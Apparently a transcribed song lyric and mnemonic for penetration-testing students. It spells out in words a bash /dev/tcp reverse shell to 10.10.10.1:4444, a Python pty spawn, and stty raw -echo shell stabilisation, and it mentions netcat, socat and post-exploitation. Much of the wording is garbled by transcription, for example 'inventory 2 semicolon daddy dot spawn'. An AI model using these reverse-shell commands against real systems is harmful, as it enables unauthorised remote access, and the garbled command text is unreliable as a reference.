Once upon a scan, found a way in. Web servers weak, now let's begin. I drop my payload, make it stack. I want the shell to call me back. Command injection, yeah, that's the hack. Time to reverse shell, send it back. Say it with me now, here's the plan. Bash space dash I space greater than ampersand space slash dev slash tc paste slash 10.10.10.1 space slash 4444 space 0 greater than ampersand 1. Boom, I'm in got that shell, but it's unstable, I can already tell. Back, reverse it back, reverse that shell. Netcat open and I'm feeling wow. But don't forget, before you brag, you gotta stabilize or you'll hit a snag. PDY time, run it clean. Python spawn slash bin slash bash on screen. Say it now, spell it out. Python 3 space dash G space quote inventory 2 semicolon daddy dot spawn open parents quote slash bin slash bash quote close parents quote. Now I'm in, but things feel wrong. Can't arrow up, can't control C strong. So here's what I do to make it last. I bring that shell to full contrast. Step 1, export term. Export space term equals xterm. Now pause, press Ctrl or Z. Drop to my host, listen to me. Type this in, std space raw space dash echo then fg, and I'm back like a techno gecko. Now tab complete, Control C. This shell's mine, totally free. Reverse it back, reverse that shell. Netcat open and I'm feeling well. But don't forget, before you brag, you gotta stabilize or you'll hit a snag. PD right time, run it clean. Python spawn slash bin slash bash on screen. Say it now, spell it out. Python 3 space dash she space quote inventory 2 semicolon petty dot spawn open parents quote slash bin slash bash quote close parents quote.
No Python, try polar bash. One-liners hidden in the trash. Got PHP, then curl it in. Anything that makes that shell begin. Got SoCat, upgrade your ride. Earl rap keeps a red line by your side. Enumerate, get root if you can, but don't forget the post-exploitation plan.
Reverse it back, we got that shell. Stabilize, now we hack so well. Shell shock, got full control. This is how you play that Pantis roll. Say it one last time, just for the crowd. Bash space dash out space greater than ampersand. You know it now.